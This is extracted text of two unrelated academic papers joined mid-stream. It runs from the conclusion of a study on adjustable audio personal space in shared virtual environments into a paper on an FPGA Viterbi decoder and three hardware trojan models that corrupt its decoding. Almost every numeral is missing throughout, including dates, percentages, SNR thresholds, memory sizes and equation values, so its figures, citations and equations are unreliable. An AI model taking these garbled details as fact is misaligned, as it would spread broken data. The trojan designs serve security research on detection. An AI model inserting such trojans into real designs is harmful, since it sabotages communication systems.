it comes in a light-weight form, functions well as a personal space, and can increase the close attention paid between participants. besides, based on our findings, it does not introduce significant negative impacts, whereas rigid personal space does.
( ) beyond audio-related tasks, when providing personal space in sves, lightweight free-form personal space rather than personal space with a rigid form should still be considered first, as it introduces fewer negative impacts on collaboration and enables a fluid shift, which matches the findings of greenberg, boyle & laberge ( ). the basis for providing light-weight privacy is not limited to audio; it can be provided by other modalities as well (e.g., visual). for example, in this study, augmented attenuation in sound has been verified to provide a useful personal space for cmm in sves. similarly, a visual augmentation might be used for vision-related collaborative tasks (e.g., collaborative drawing) in sves. multiple modalities can also be used simultaneously for tasks involving multiple modalities; an example task could be making a short animation and creating an accompanying music track for it.
( ) manipulating the level of augmentation (e.g., the augmented acoustic attenuation in this study) can change the level of feeling personal. in the caug condition of this study, participants adjusted the distance between themselves and their collaborators to obtain a different level of being personal (herein referred to as ''personalness''); e.g., total isolation can be achieved if both participants are working at a distance greater than . metres. we believe that, similarly, when personal spaces are provided with a gradual and adjustable boundary, manipulating the parameter of the boundary (e.g., the degree of augmented attenuation) can impact the level of ''personalness'' and therefore adjust the impact of introducing personal space. for example, the augmented attenuation can be set to a very low level if an extremely minimal impact is being pursued. so adding a method enabling users to adjust this level can allow users to shift between having a ''very personal'' space with total isolation, where they can neither hear nor see each other's work, and having no personal space, where they have to work together. in this way, users can be enabled to manipulate the level between ''personalness'' and togetherness continuously, which is useful in allowing users to develop their own ideas and work together to tailor their own work into the collaborative piece. compared with adjusting ''personalness'' by distance in caug, adjusting it by changing the parameter might also be useful as co-workers can then stay anywhere whilst still being able to adjust the ''personalness'' that the personal space provides.
( ) when it is hard or impossible to design a gradual, light-weight personal space that is applicable to the task due to the type of the task, and a rigid-form personal space has to be considered, it is better to provide the rigid personal space with mobility, as the mobility feature gives users more freedom in accessing the personal spaces, and produces a better user experience with fewer negative impacts on the collaboration compared with rigid personal space without mobility. this implication also echoes the proposal raised in our previous work (men & bryan-kinns, ).
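to make implications ( ) and ( ) concrete, below is a minimal sketch of a distance-based gain curve with an adjustable augmentation parameter of the kind described: setting the parameter to zero leaves everything audible (as in cpub), while larger values roll the collaborator's sound off more steeply, giving a more ''personal'' space. the curve shape, the cut-off distance and the parameter values are assumptions for illustration and are not lemo's actual audio model.

```python
import numpy as np

def augmented_gain(distance, cutoff=2.4, augmentation=2.0):
    """
    Gain in [0, 1] applied to a collaborator's sound sources.
    augmentation = 0  -> no extra attenuation (everything audible, as in CPub)
    larger values     -> steeper roll-off, i.e. a more 'personal' space
    For augmentation > 0 the gain reaches zero at `cutoff` metres and beyond.
    All numeric values are illustrative placeholders.
    """
    d = np.clip(distance / cutoff, 0.0, 1.0)   # normalised distance in [0, 1]
    return float((1.0 - d) ** augmentation)

for d in (0.5, 1.0, 1.5, 2.0, 2.4):
    print(f"{d:.1f} m -> gain {augmented_gain(d):.2f}")
```

exposing such a parameter at run time would let users trade ''personalness'' against togetherness continuously, as implication ( ) suggests, rather than relying solely on physical distance.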
conclusions
in this article, we have reported an experiment exploring how four different spatial configurations impact collaboration differently. both quantitative and qualitative data were presented and analysed, comparisons between conditions were made, differences were found, and five design implications were given. specifically, augmented attenuation can support individual creativity and the fluid shift between group activity and individual activity well during collaboration in an sve, with minimal negative impacts on collaboration introduced. we also found that a rigid personal space with mobility serves users' needs better and is preferable over a non-mobile one. in the future, we are keen to explore how to design and apply personal spaces with fluid boundaries in a wider range of creative scenarios in sves; e.g., for collaborative drawing in an sve, personal space (visual privacy) might be provided by creating a foggy environment: the farther away the drawing objects are, the blurrier the collaborators perceive them to be. we are also interested in how the boundary might be manipulated and whether the manipulation can result in different impacts on collaborative behaviour.

additional information and declarations

funding
this work was supported by the epsrc and ahrc centre for doctoral training in media and arts technology (ep/l x/ ) and the china scholarship council. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: epsrc and ahrc centre for doctoral training in media and arts technology: ep/l x/ . china scholarship council.

competing interests
the authors declare there are no competing interests.

author contributions
• liang men conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft of the manuscript submitted for review and publication.
a viterbi decoder and its hardware trojan models: an fpga-based implementation study
varsha kakkara*, karthi balasubramanian, b.
yamuna, deepak mishra, karthikeyan lingasubramanian and senthil murugan*
department of electronics and communication engineering, amrita school of engineering, amrita vishwa vidyapeetham, coimbatore, tamil nadu, india; digital communication division (dcd), optical and digital communication group (odcg), satcom navigation payload area (snpa), space application center (sac), isro, ahmedabad, gujarat, india; electrical and computer engineering, university of alabama, birmingham, al, usa; department of electronics and communication engineering, amrita school of engineering, amrita vishwa vidyapeetham, amritapuri, kerala, india. * these authors contributed equally to this work.
abstract integrated circuits may be vulnerable to hardware trojan attacks during their design or fabrication phases. this article is a case study of the design of a viterbi decoder and the effect of hardware trojans on a coded communication system employing the viterbi decoder. the design of a viterbi decoder and possible hardware trojan models for it are proposed. an fpga-based implementation of the decoder and the associated trojan circuits is discussed. the noise-added encoded input data stream is stored in the block ram of the fpga and the decoded data stream is monitored on the pc through a universal asynchronous receiver transmitter interface. the implementation results show that there is barely any change in the luts used ( . %) and power dissipation ( %) due to the insertion of the proposed trojan circuits, thus establishing the surreptitious nature of the trojans. although the trojans cause negligible changes in the circuit parameters, there are significant changes in the bit error rate (ber) due to their presence. in the absence of trojans, the ber drops to zero for signal-to-noise ratios (snrs) higher than db, but with the trojans present, the ber does not reduce to zero even at very high snrs. this holds even when the trojan is activated only once during the entire duration of the transmission.
subjects computer architecture, mobile and ubiquitous computing, security and privacy
keywords coded communication system, hardware trojan, viterbi decoder, bit error rate
introduction
the entry of connected technologies into the realms of the internet of things (iot) and cyber physical systems (cps) has made it imperative for communication systems to be protected from possible threats. these threats can arise from both software externals and hardware internals. while considerable emphasis is being given to software-level threats, in this work we focus on hardware-level threats. the hardware of a communication system can be compromised if its design is exposed so that it can be modified or duplicated.
how to cite this article kakkara v, balasubramanian k, yamuna b, mishra d, lingasubramanian k, murugan s. a viterbi decoder and its hardware trojan models: an fpga-based implementation study. peerj comput. sci. doi . /peerj-cs. submitted may accepted december published march. corresponding author karthi balasubramanian, b_karthi@cb.amrita.edu. academic editor miriam leeser. additional information and declarations can be found on page . copyright kakkara et al. distributed under creative commons cc-by .
/ http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ this allows an adversary to deteriorate the performance of a communication system and expose the system to attacks. this makes understanding of the hardware level threats significant. in this work, we focus on the effect of one such threat called hardware trojans, on coded communication systems that use a viterbi decoder as the error correcting unit. overview of coded communication system design of efficient coder–decoder for error control has received increased interest in recent years. this is due to the fact that all digital transmission and storage requires error control strategy to ensure reliability. information symbols from a source are encoded by the addition of controlled redundancy. convolutional codes and block codes are the broad classification of error control codes. an error control decoder makes the best estimate of the transmitted codeword by making use of the redundancy added at the encoder. the transmitted codewords are encoded information symbols that are subject to errors, in the process of transmission through noisy communication channels. these transmitted codewords can be decoded with as low bit error rate (ber) as possible for transmission rates upto the channel capacity (sweeney, ). the block level representation of a coded communication system is shown in fig. . hardware trojans in the current scenario of integrated circuits (ics) manufacturing, a globalized business model has emerged where ics are manufactured in foundries that are distributed in various parts of the world. a hardware trojan is a malicious stealthy modification that leads to malfunctioning of the system (colins, ). such modifications in the system provides a back door entry for the trojans. the three main categories of hardware trojans are based on their action, physical and activation characteristics (chakraborty, narasimhan & bhunia, ; tehranipoor & koushanfar, ; karri et al., , banga et al., ; ranjani & devi, ). the physical characteristics category describes the various hardware manifestations of trojans according to their shape and figure coded communication system. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ size; the activation characteristics describe the conditions that activate the trojans and action characteristics refer to the behavior of the trojans. figure gives the classification of trojans based on insertion phase, abstraction level, activation mechanism and effects. hardware trojans can be inserted at different stages of ic design cycle, while the most prevalent phases are design and fabrication. likewise, trojans can be realized at different levels of ic design abstraction and can be designed to get triggered internally by specific states of the system, or externally through any communication medium. the former can be stealthy based on the occurrence of the problem states, while the latter will be untraceable in test phase because it is not triggered internally. regarding the effect of trojans on the affected system, they are generally designed by the adversary to change functionality or leak sensitive information or deny service during critical instances or compromise the communication system and reduce the reliability of the design (karri et al., ). 
there are numerous post manufacturing techniques for detecting trojans but a single technique is difficult to be devised for detecting trojans universally. side channel and logic testing form the two classical trojan detection techniques (narasimhan et al., ). in these two methods, a golden circuit is used to compare with outputs of the circuit under test. typically, trojans are devised to activate rarely to escape logic testing and evade detection. they also possess small physical characteristics to evade side channel based testing. trojan modeling trojans are generally modeled for the specific design of interest that they intended to disrupt. examples of trojan benchmark circuits aimed at infecting systems like advanced encryption system, serial interface rs , ethernet mac, and pic microcontrollers can be found at (trusthub, ). these circuit models have been widely used to study the effectiveness of trojan infection and to design measures to thwart them. to study the trojan effect on other systems, custom trojan models are designed. a few figure hardware trojan taxonomy. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ studies that have been done in recent years on a system level using custom trojan models are listed below: . saeidi & garakani ( ): multiple hardware trojans have been designed for a × array of six transistor sram block, that either corrupt the output or modify the delay and duty cycle of the enable signals. the trojans are trigged by an address sequence that is not generally produced in conventional testing methodology, thereby helping them to evade detection by conventional sram testing. . tiwari et al. ( ): a hardware trojan model has been proposed for launching denial of service attack to on-chip multicast routing algorithms. the trojan is modeled to use the on-chip temperature sensor information to identify suitable nodes and launch attack on multicast data packets. . liu et al. ( ): the design and custom silicon implementation of secret key leaking trojans present in the ultrawide band transmitter of a wireless cryptographic ic has been presented. the trojan circuit leaks the encryption key without disrupting the normal operation. this is achieved by hiding the key in the power amplitude and frequency margins that are acceptable due to process variations. . kumar et al. ( ): novel hardware trojans are proposed that induces denial of service and performance degradation in a network on chip. the trojan is triggered by a complex bit pattern generated from input messages, intended toward misleading the packets away from the destination address. . subramani et al. ( ): hardware trojan attack is modeled by modifying the encoder block of a . a/g transmitter. this is accomplished by hijacking some of the legitimately encoded bits and substituting with rogue bits. trojan modeling of channel decoders channel decoders are a quintessential part of any coded communication system. they are soft targets for trojan attacks and can be embedded with malicious blocks for the following reasons: (hemati, ). . they have a direct interface with the outside world that make them susceptible to being hijacked. . they process noisy information that makes it impossible for a even a perfectly functional decoder to be successful all the time. hence a trojan affected system may easily claim false failures and masquerade its real purpose. . 
brute force approach of running all test cases to identify malicious activity is not practical for even a medium block length, since the number of input and output combinations is huge.
in spite of the fact that channel decoders are highly susceptible to trojan attacks, the effects of trojans on them have not been explored in the literature. hemati ( ) has proposed the use of stochastic techniques at a system level for mitigating trojan effects in a channel decoder, but an rtl-level analysis is missing. our work involves the proposal and analysis of possible trojans on a specific channel decoder, namely the viterbi decoder. the work is concentrated on the rtl design of a viterbi decoder and possible trojans that may compromise the communication system and reduce the reliability of the decoder. the viterbi algorithm is widely used for decoding convolutional codes since it achieves a maximum-likelihood estimate of the convolutionally coded transmitted sequence (forney, ). a low ber can be achieved by a viterbi decoder (viterbi, ). however, the presence of trojans can affect the performance of the decoder significantly. this has been demonstrated with a proof of concept in our earlier work (aravind et al., ), where trojan models were proposed and behavioral modeling studies at the algorithmic level showed that the ber performance of a convolutional decoder using the viterbi algorithm is degraded by the presence of the hardware trojans. the current work extends this proof of concept to an rtl-level circuit design of the decoder and the trojan activities. a practical implementation of the viterbi decoder is achieved and the trojan effects on the system are analyzed.
the article is organized as follows. the viterbi decoder section walks the reader through the viterbi algorithm with a suitable example. this is followed by the section on the hardware design of the decoder for fpga implementation. results from simulation and fpga implementation of the decoder are discussed after that, followed by the section on the design of the trojans. results and discussions on the trojan-based design are presented, and the article then concludes with references to possible future work.
viterbi decoder
the n encoded output bits in an (n, k, m) convolutional code depend on the k present input blocks as well as the m past input blocks. a memory-m sequential circuit is used for realizing the convolutional encoder. the trellis diagram of the rate-half, m = , convolutional encoder is shown in fig. , and the corresponding state diagram of the trellis is shown in fig. . (figure: trellis structure of the convolutional encoder.)
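before moving to the hardware design, a short behavioral sketch may make the trellis operations concrete. the python fragment below is only an illustration, not the authors' matlab or verilog code: the generator polynomials (7, 5 in octal) and the random bit-flip channel are assumptions introduced here for demonstration, since the text does not state which rate-half, m = 2 encoder taps are used. the decoder mirrors the bmu (hamming distance), pmu (add-compare-select) and traceback steps described in the following sections.

```python
# Behavioral sketch of a rate-1/2, memory-2 convolutional encoder and a
# hard-decision Viterbi decoder over its 4-state trellis. Generator
# polynomials (7, 5 octal) and the bit-flip channel are assumed for
# illustration only; they are not taken from the paper.
import random

G = [0b111, 0b101]        # assumed generators g0 = 7, g1 = 5 (octal)
N_STATES = 4              # memory m = 2  ->  2^m trellis states

def encode(bits):
    """Encode a message (already terminated with m zeros): 2 output bits per input bit."""
    state, out = 0, []
    for b in bits:
        reg = (b << 2) | state                         # current input + 2 memory bits
        for g in G:
            out.append(bin(reg & g).count("1") & 1)    # parity of the tapped bits
        state = reg >> 1                               # shift register update
    return out

def viterbi_decode(received, n_bits):
    """BMU (Hamming distance) + PMU (add-compare-select) + traceback."""
    INF = float("inf")
    trans = {}                                         # (state, input) -> (next state, output pair)
    for s in range(N_STATES):
        for b in (0, 1):
            reg = (b << 2) | s
            trans[(s, b)] = (reg >> 1, tuple(bin(reg & g).count("1") & 1 for g in G))

    path_metric = [0] + [INF] * (N_STATES - 1)         # decoding starts from the all-zero state
    decisions = []                                     # survivor (prev_state, bit) per state, per step
    for t in range(n_bits):
        r = received[2 * t: 2 * t + 2]
        new_metric, step = [INF] * N_STATES, [None] * N_STATES
        for s in range(N_STATES):
            if path_metric[s] == INF:
                continue
            for b in (0, 1):
                ns, out = trans[(s, b)]
                branch = (out[0] != r[0]) + (out[1] != r[1])   # Hamming distance (BMU)
                metric = path_metric[s] + branch
                if metric < new_metric[ns]:                    # add-compare-select (PMU)
                    new_metric[ns] = metric
                    step[ns] = (s, b)
        decisions.append(step)
        path_metric = new_metric

    # Traceback: the terminating zeros force the final state to be the zero state.
    state, bits = 0, []
    for step in reversed(decisions):
        prev, b = step[state]
        bits.append(b)
        state = prev
    return list(reversed(bits))

msg = [random.randint(0, 1) for _ in range(20)] + [0, 0]   # append m terminating zeros
noisy = [b ^ (random.random() < 0.05) for b in encode(msg)]  # flip roughly 5% of the coded bits
decoded = viterbi_decode(noisy, len(msg))
print("bit errors after decoding:", sum(a != b for a, b in zip(msg, decoded)))
```

running the fragment repeatedly gives a feel for how the maximum-likelihood path usually removes the injected channel errors, which is the behavior the ber plots later in the article quantify.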
by adding terminating zeros to the message sequence, it is ensured that the decoder always starts from an all-zero initial state when decoding a message sequence. a detailed example showing the decoding procedure may be found in the supplemental document.
fpga based viterbi decoder design
the viterbi decoder was designed in verilog and implemented on a xilinx zybo-z board. figure shows the top-level implementation structure, which includes the core decoder block, a single-port block ram (bram) of size × , to store the input data and a single-port block ram of size × to store the decoded data. (figure: state transitions of the encoder.) along with these, a universal asynchronous receiver transmitter (uart) transmitter module is also integrated to monitor the decoded data on a pc.
input interface
the noise-added encoded message is stored in the input bram and data is transferred to the decoder block through the input interface. the interface logic unit consists of a counter and an eight-bit shift register as shown in fig. . it reads the data byte-wise from the bram and transmits two bits per clock cycle to the decoder block for further processing. at every clock cycle the two lsb bits are shifted out to the branch metric unit (bmu) block. after every four clock cycles, the subsequent bram location is read and processed similarly. (figures: block-level diagram for fpga implementation of the viterbi decoder; input interface.)
decoder design
figure shows the top-level block diagram of the decoder consisting of the bmu, path metric unit (pmu), survivor path memory unit (spmu), spmu_controller and the trace back unit (tbu).
branch metric and path metric units
the bmu calculates the hamming distance between the received frame and the branch word, while the pmu performs add-compare-select (acs) calculations as described in middya & dhar ( ). figures and show the blocks used for the hamming distance calculation and the acs units. during every clock cycle, the bmu calculates the eight branch metrics corresponding to the two transitions of each of the four states. the branch metrics are then passed on to the pmu, which updates each state with the least path metric and also stores the corresponding path leading to it in the form of a "decision bit," one for each of the four states at every time instant. (figures: decoder block diagram; hamming distance unit.) it can be seen from the trellis diagram in
survivor path memory unit and trace back unit survivor path memory is designed as a single port bram that stores the decision bit values of all states at each of the time instants. the structure of the spmu is the same as the trellis structure shown in fig. . for the input data size of , bytes, the number of decision bits generated would be , for every state. thus a × , bram is used as the spmu. the spmu_update module reads the decision bits from the pmu block and updates the spmu every clock cycle. this continues till the spmu is populated with all the × , figure pmu blocks for all the four states. full-size doi: . /peerj-cs. /fig- figure add carry select block. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ decision bit values. once the spmu is populated with the decision bits, the decode_en bit is triggered high and the trace back unit kicks in to start the reverse process to decode the original input bits. figure shows the state machine used for the trace back operation. since the encoded message is terminated with zeros, the final state of the system would be the zero state and hence tbu can be safely initialized to start the decoding from the zero state. after decoding all the , bits, decode_done signal is activated to trigger the output interface. it is to be noted that it takes around , clock cycles for the forward tracing, , clock cycles for traceback and few cycles are required for synchronization. output interface the output interface consists of a first-in-first-out (fifo) buffer of size × ( , bits) to store the decoded data and the baud generator and transmitter modules of uart to transmit the data serially on to a pc. the uart is designed with a frame length of (one start bit, eight data bits and one stop bit) and works at a baud-rate of , bps. figure shows the uart frame used in the design. the data from the decoder is first stored in the fifo and is transmitted when an external request for data transfer is enabled. the fifo is designed using a bram of size × . fifo is chosen to be one byte wide to enable byte wise data transfer to the uart figure bit uart frame. full-size doi: . /peerj-cs. /fig- figure state transition diagram of the trace back unit (tbu). full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ transmitter easily. figure shows the transmitter block designed to operate at a baud rate of , bps. the uart transmitter contains the baud generator that generates the uart clock corresponding to a baud rate of , bps. to generate this clock from the master clock, we use a clock divider whose value can be obtained by using eq. ( ) baudrate ¼ master clkð � divisorÞ ( ) since the master clock of the fpga board (zybo-z ) is mhz, we need to design a clock divider of value given by eq. ( ) divisor ¼ master clkð � baudrateÞ ¼ : ( ) rounding off to the nearest highest integer, we use a clock divider of value to generate the uart clock and data is transmitted out serially to the pc through a rs interface. simulation and implementation of viterbi decoder input data generation a coded communication system is set up as detailed in the introduction section, using matlab. 
k message bits are generated randomly and encoded using a convolutional encoder of rate / to generate k encoded bits. binary phase shift keying modulation is used to modulate the encoded message stream and the resulting data sequence is transmitted through an additive white gaussian noise channel of varying signal to noise rations (snrs). the received sequences are demodulated and stored as inputs for the viterbi decoder. design and functional verification the viterbi decoder was first designed using a behavioral model in matlab and then a synthesizable rtl design was done in verilog. the original encoded message sequence (without noise addition) is given as input to the decoders and the output was verified to be the original message sequence. this establishes that the decoders are functionally correct. figure uart transmitter. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ having verified the functionality of the designs using the encoded message as the inputs, the noise-added sequences are given as inputs and the bers are computed. fpga implementation the rtl design of the decoder was synthesized on to a zybo board that is built using z- , a member of xilinx zynq- family. z- is designed using xilinx all programable system-on-chip architecture, that integrates a xilinx -series fpga along with an arm based cortex-a processor. in our work, we have not used the arm processor for generating test inputs but instead, the test vectors are generated from matlab as briefed above and a single port bram is initialized with these input test vectors. the decoded output bits are first stored in another bram and then sent by the uart transmitter to the pmod pins of the zybo board. this transmitted data is driven through a uart-to-usb translator (pl ) and the serial bits are captured on the pc using real term serial terminal (realterm, ). functional verification of the implemented design was done in the same manner as the simulated design. the encoded message bits without noise addition were given as the input and the decoded bits were compared with the original message sequence. it was figure comparative ber plots for matlab behavioral design, rtl design and the fpga implementation (beyond db, the ber is zero). all three plots overlap perfectly, thus establishing the correctness of the implementation. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ verified that the decoded and input message bits matched successfully. for calculating the decoder performance, the decoder was fed with noisy data of different snrs. figure shows the bers obtained for the matlab behavioral model, the rtl design and the fpga implementation where it can be seen that the ber drops down to zero for snrs greater than db . also, there is a perfect overlap of all the plots, thus demonstrating the equivalence of the behavioral, rtl and the implemented models. trojan design and implementation in this work, we propose the design of three possible trojans and study how their stealthy presence may affect the system performance. 
trojan design : decision-bit flipping trojan (pmu trojan) in the pmu, it is expected that the comparator identifies the least path metric path and correspondingly store a “ ” or “ ” to indicate either of the paths to be traversed during trace back. the proposed trojan decision-bit flipping, when enabled, flips the decision bits thus causing the trace back unit to proceed in an incorrect decoding path. the hardware model of the trojan circuit is shown in fig. . the decision bit is inverted when trojan is enabled and the spmu gets populated with an incorrect value. this causes the lower metric path to be discarded instead of the higher path metric, thus resulting in possible erroneous decoding. trojan design : traceback path modification trojan during trace back, the decision bits from the spmu is read and a path is chosen based on whether the stored value is a “ ” or a “ ”. the traceback path modification trojan inverts this logic and changes the state transitions, thus making it proceed in the wrong path. figure shows the modified state machine due to the trojan being effective. when the trojan is enabled, the transitions are made to differ from the original state transitions resulting in erroneous decoding. trojan design : shift-direction-modifying trojan in the output interface, when the decoded data is being written into the shift register, normally it will be right shift operation. but when the trojan is enabled this operation will be reversed and performs left_shift thus sending erroneous data to the transmitter. this can be achieved by the use of multiplexers that can alter the shift direction based on figure pmu trojan. full-size doi: . /peerj-cs. /fig- since the ber is plotted on a log scale, it is not possible to indicate the zero values on the plot kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the trojan enable signal. figure shows the trojan circuitry that is created due to this trojan. results and discussions the effectiveness of the designed trojans can be gauged by their stealthy nature and by their propensity to degrade the performance of the infected system. figure shift direction modifying trojan. full-size doi: . /peerj-cs. /fig- figure trojan effect modifying the trace back path in the tbu. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ stealthy trojans trojans by nature are stealthy in nature and are difficult to detect. to verify if the proposed trojan models are stealthy enough to evade detection, the difference in the area and power dissipated due to the trojan insertion are calculated. tables and show the power and utilization summary of the trojan free circuits and the trojan affected circuits. it is to be noted that the parameters obtained is only for the decoder logic without including the input bram and the output uart. it can be seen from the power and area utilization results that in the worst case, there is a difference of only mw of on-chip power (difference of . %), and only four extra luts (change of . %) due to the trojan insertions. this establishes its stealthy nature, thus qualifying them as effective trojans. 
performance degradation to analyze how effectively the trojans disrupt the natural decoding process, the trojans are triggered at random time instants and the decoded bits are analyzed. generally, trojans are designed to activate surreptitiously in order to go unnoticed. hence the triggering was done only once during the entire decoding process and the effect of this triggering is observed and the resultant ber is calculated. trojan triggering logic figure shows the circuit for generating trojan enable signal. it consists of a bram, a bit counter to count up to the maximum possible number of clock cycles required for decoding and a comparator. the trojan can be triggered any time during the entire duration of decoding. to identify these triggering instances, random numbers are generated and stored in a block ram. during each triggering one location is read from the bram as the triggering instance. the trojan enable signal is generated when the counter value matches with the random number being read from the bram. the ber is calculated to be the average of the bers obtained from all the triggering instances. table power summary table. power summary (w) without trojan pmu trojan tbu trojan shift modification trojan total on-chip power . . . . dynamic . . . . device static . . . . table utilization summary table. utilization without trojan pmu trojan tbu trojan shift modification trojan site type available used util% used util% used util% used util% slice luts , . . . . lut as logic , . . . . lut as memory , . . . . kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure trojan triggering logic. full-size doi: . /peerj-cs. /fig- figure ber plot for pmu trojan. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effect of the triggered trojans the effect of the trojans may be quantified by the increase in the bers of the infected decoder. figures – show the comparative ber graphs of the decoder without trojan and with trojan being activated only once. it can be seen that in the absence of trojans, the ber drops down to zero for snrs greater than db, but with the trojans being active, the ber doesn’t reduce to zero even for high snrs. thus the trojans leave a distinctive ber signature (high ber). among the three trojans, the ber signature is highest for tbu trojan and lowest for pmu trojan, with the shift modification trojan producing a ber signature in between the other two. it is also interesting to note that the difference in the performances between the trojan free design and the design with trojans is negligible in the low snr regions but the difference is prominent in the high snr regions. also at some low snr conditions, the performance of the trojan affected system is slightly better than the unaffected system. this scenario is possible since, in the low snr regions, the data itself is noisy and erroneous. during the bit flipping or the state transition or the shift direction modifying actions of the trojans there exists a possibility that few erroneous bits are converted to correct bits, thus providing a reverse effect on the system. the possibility of this kind of behavior, along with the fact that trojans are stealthy make it difficult to conjure figure ber plot for tbu trojan. full-size doi: . /peerj-cs. 
/fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effective trojan detection schemes. to counter such situations, the current focus of researchers is to neutralize them apart from detecting the trojans (gunti & lingasubramanian, ). study limitations the study proposes stealthy trojans—decision bit flipping, traceback path modification and shift direction changing trojans—and their effect on the decoding efficiency of a viterbi decoder. the trojans degrade the performance of the decoder, causing it to have a high ber. but, it is to be noted that high ber can also arise in a system due to high noise in the channel. hence in situations where the channel’s noise characteristics are unknown, the presence of these trojan can’t be inferred purely from the ber signature. it needs to be augmented with other trojan detection schemes to correctly infer the presence of trojans. conclusions in this work, we have designed a fpga based implementation of a viterbi decoder and presented possible effects of hardware trojans on coded communication systems. three unique threat models are developed and tested on the viterbi decoder which is popular figure ber plot for shift direction modifying trojan. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for its low ber performance. however, we show that the presence of the proposed trojans affect the efficiency of the viterbi decoder by increasing the ber. the stealthiness of the proposed trojans is also established. using the proposed threat models, we envision to test their effects on complex systems like cps and iot which rely on efficient communication channels. with the wide application of convolution codes in various snr scenarios, the results of the implemented system play a significant role in emphasizing the need for efficient trojan detection schemes. it is envisaged that apart from ber signature analysis, other trojan detection and neutralizing schemes will be explored for the proposed trojans. additional information and declarations funding this work was supported by space application center, isro through respond project /isro/res/ / / - . deepak mishra from isro is a coauthor and was involved in the study design, analysis and preparation of the article. grant disclosures the following grant information was disclosed by the authors: space application center, isro through respond project: /isro/res/ / / - . competing interests deepak mishra is a scientist at the indian space research organization (isro), ahmedabad, india. author contributions � varsha kakkara conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � karthi balasubramanian conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � b. yamuna conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � deepak mishra conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. 
� karthikeyan lingasubramanian conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � senthil murugan conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: the raw data generated from matlab are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aravind ar, kesavaraman sr, balasubramanian k, yamuna b, lingasubramaniam k. . effect of hardware trojans on the performance of a coded communication system. in: ieee international conference on consumer electronics (icce). las vegas: ieee, – . banga m, chandrasekar m, fang l, hsiao ms. . guided test generation for isolation and detection of embedded trojans in ics. in: proceedings of the th acm great lakes symposium on vlsi. new york: acm, – . chakraborty rs, narasimhan s, bhunia s. . hardware trojan: threats and emerging solutions. in: ieee international high level design validation and test workshop. san francisco: ieee, – . colins d. . trust in integrated circuits (tic): darpa solicitation baa - . arlington county: darpa. forney gd. . convolutional codes . maximum-likelihood decoding. information and control ( ): – doi . /s - ( ) - . gunti nb, lingasubramanian k. . effective usage of redundancy to aid neutralization of hardware trojans in integrated circuits. integration : – doi . /j.vlsi. . . . hemati s. . mitigating hardware cyber-security risks in error correcting decoders. in: th international symposium on turbo codes and iterative information processing (istc). brest: ieee, – . karri r, rajendran j, rosenfeld k, tehranipoor m. . trustworthy hardware: identifying and classifying hardware trojans. computer ( ): – doi . /mc. . . kumar m, swain ak, kumar s, sahoo sr, mahapatra k. . run time mitigation of performance degradation hardware trojan attacks in network on chip. in: ieee computer society annual symposium on vlsi (isvlsi). hong kong: ieee, – . liu y, jin y, nosratinia a, makris y. . silicon demonstration of hardware trojan design and detection in wireless cryptographic ics. ieee transactions on very large scale integration (vlsi) systems ( ): – doi . /tvlsi. . . middya a, dhar as. . real-time area efficient and high speed architecture 